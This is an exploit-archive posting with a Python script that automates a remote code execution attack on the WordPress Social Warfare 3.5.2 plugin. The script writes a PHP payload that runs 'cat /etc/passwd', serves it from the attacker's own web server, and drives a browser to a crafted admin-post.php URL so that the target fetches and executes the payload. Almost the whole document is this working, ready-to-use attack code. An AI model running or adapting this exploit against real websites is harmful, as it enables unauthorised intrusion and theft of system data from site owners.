WordPress Social Warfare 3.5.2 Remote Code Execution

WordPress Social Warfare plugin version 3.5.2 remote code execution exploit. This fully automated exploit is a variation of the original discovery made by Luka Sikic and hash3liZer in May of 2019.


MD5 | fb7aee67e4e3485ee6bbbc9c8e188cbc

# Author = Raed Ahsan
# Creation Date = 24/07/2021
# Vulnerability : SocialWarfare 3.5.2 plugin wordpress Remote Code Execution
# Linkedin = https://linkedin.com/in/raed-ahsan/


import socket
import requests
import subprocess
import time
import pyautogui

print("[*]Start your python SimpleHTTPServer on port 1234 please...")
time.sleep(5)
# Creating the payload for wordpress url
with open("shell.txt", "w") as file:
file.write("<pre>system('cat /etc/passwd')</pre>")

print("[*]Payload has been created")

with open("url.txt", "w") as url:
url.write("http://{MACHINE_IP}/wordpress/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://{YOUR_IP}:{YOUR_PYTHON_SERVER_PORT}/shell.txt")
print("[*]Use the URL in the url.txt")
print("[*]Make sure to edit the ip and port in the url.txt according to your needs")
"""
EDIT THE IP AND PORT IN THE URL.TXT FILE ACCORDING TO YOUR NEEDS
"""
print("[*]Moving the shell.txt to /var/www/html")
time.sleep(3)
username = input("What's your username in your machine: ")
subprocess.call([f'sudo cp /home/{username}/Desktop/shell.txt /var/www/html'], shell=True)
print("[*]File copied to /var/www/html")
time.sleep(2)
print("[*]Opening Apache2 service...")
print("[*]Make sure you have apache2 installed")
subprocess.call(["sudo service apache2 start"], shell=True)
print("[*]Service started")

machine_ip = input("Target Machine IP: ")

print("[*]Open your python listener at port 1234")

time.sleep(2)
print("[*]Opening Browser")

pyautogui.hotkey('winleft')
pyautogui.typewrite('chrome\n', 0.5)
pyautogui.typewrite(f'http://{machine_ip}/wordpress/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://192.168.49.200:1234/shell.txt\n', 0.2)

print("[*]If you're on tun0, make sure to change the ip in the auto execution of url section.")

print("If you want to edit the shellcode instead of /etc/passwd, do edit the shell.txt from /var/www/html and refresh the page")

Related Posts